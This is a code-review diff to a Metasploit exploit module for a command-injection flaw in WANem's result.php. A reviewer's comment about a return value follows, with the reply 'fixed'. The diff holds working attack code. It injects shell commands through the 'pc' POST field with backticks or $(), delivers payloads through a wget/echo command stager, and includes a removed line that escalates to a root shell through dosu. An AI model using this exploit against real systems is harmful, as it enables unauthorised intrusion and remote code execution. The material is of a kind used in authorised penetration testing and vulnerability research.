modules/exploits/linux/http/wanem_exec.rb

```diff
@@ -7,103 +7,94 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'Payload'        =>
         {
-          'Space'       => 1024,
-          'BadChars'    => "\x00\x22\x27",
+          'Space'       => 2_000,
           'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic netcat netcat-e',
-            }
-        },
-      'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread'
+          'BadChars'    => "\x00\x22\x27\\",
         },
       'Targets'        =>
         [
-          ['Automatic Targeting', { 'auto' => true }]
+          [ 'WANem 2', { 'CmdStagerFlavor' => [ :echo, :wget ] }],
+          [ 'WANem 3', { 'CmdStagerFlavor' => [ :echo, :bourne, :printf, :wget ] }]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Aug 12 2012'
     ))
   end
 
-  def on_new_session(client)
-    client.shell_command_token("/UNIONFS/home/perc/dosu /bin/sh")
+  def execute_command(cmd, opts = {})
+    vprint_status "Sending command: #{cmd}"
+
+    if target.name.eql? 'WANem 2'
+      post = { 'pc' => "`#{cmd}`" }
+    elsif target.name.eql? 'WANem 3'
+      post = { 'pc' => "$(#{cmd})" }
+    end
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/WANem/result.php',
+      'vars_post' => post
+    }, 10)
   end
 
   def check
-    fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
-    data  = "pc=127.0.0.1; "
-    data << Rex::Text.uri_encode("echo #{fingerprint}")
-    data << "%26"
-    vprint_status("Sending check")
-
-    begin
-      res = send_request_cgi({
-        'uri'    => '/WANem/result.php',
-        'method' => 'POST',
-        'data'   => data
-      }, 25)
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      vprint_error("Connection failed")
-      return Exploit::CheckCode::Unknown
+    fingerprint = Rex::Text.rand_text_alphanumeric rand 6..10
+    res = execute_command "echo #{fingerprint}"
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.code == 200 && res.body.include?('WANalyzer')
+      return CheckCode::Safe
     end
 
-    if res and res.code == 200 and res.body =~ /#{fingerprint}/
-      return Exploit::CheckCode::Vulnerable
-    else
-      return Exploit::CheckCode::Safe
+    unless res.body.include? fingerprint
+      return CheckCode::Detected
     end
+
+    CheckCode::Vulnerable
   end
 
   def exploit
-    data  = "pc=127.0.0.1; "
-    data << Rex::Text.uri_encode(payload.raw)
-    data << "%26"
-    print_status("Sending payload (#{payload.raw.length} bytes)")
-    begin
-      res = send_request_cgi({
-        'uri'    => '/WANem/result.php',
-        'method' => 'POST',
-        'data'   => data
-      }, 25)
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_error("Connection failed")
+    res = execute_cmdstager :linemax => 2_000, :temp => '/tmp'
```

Comment:
execute_cmdstager info specifies `@return [void]`. `res` is being set to `nil` even when the exploit works. Maybe the `unless res` and `unless res.code ... ` checks should be moved to the `execute_command` function? 
@bcoles

Reply:
fixed